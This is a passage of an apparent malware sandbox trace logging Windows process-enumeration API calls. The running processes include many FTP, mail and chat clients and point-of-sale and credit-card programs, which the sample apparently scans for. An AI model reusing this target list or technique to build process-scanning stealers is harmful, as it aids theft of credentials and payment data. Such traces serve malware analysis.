lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0213.152] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0213.154] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0213.155] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0213.158] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0213.161] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0213.163] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0213.164] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0213.166] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0213.169] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0213.171] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0213.173] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0213.174] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0213.176] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0213.178] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0213.180] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0213.182] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0213.226] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0213.228] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0213.230] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0213.232] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0213.234] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0213.235] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0213.237] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0213.239] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0213.241] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0213.243] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0213.245] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0213.247] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0213.249] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0213.251] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0213.253] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0213.255] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0213.257] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0213.259] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0213.297] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0213.299] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0213.301] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0213.302] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0213.304] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0213.307] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0213.352] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0213.354] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0213.355] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0213.357] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0213.359] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0213.361] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0213.362] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0213.364] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.366] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0213.367] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0213.369] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.371] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.376] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0213.378] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0213.416] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0213.418] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.420] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0213.422] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0213.423] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0213.425] CloseHandle (hObject=0x1eb8) returned 1 [0213.425] Sleep (dwMilliseconds=0x64) [0213.735] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0213.833] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.834] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.836] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.838] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.839] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.841] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.842] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.844] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.919] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.922] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.924] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.925] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.927] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.928] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.930] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.932] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.933] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.935] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.936] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.938] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.939] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0213.941] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, 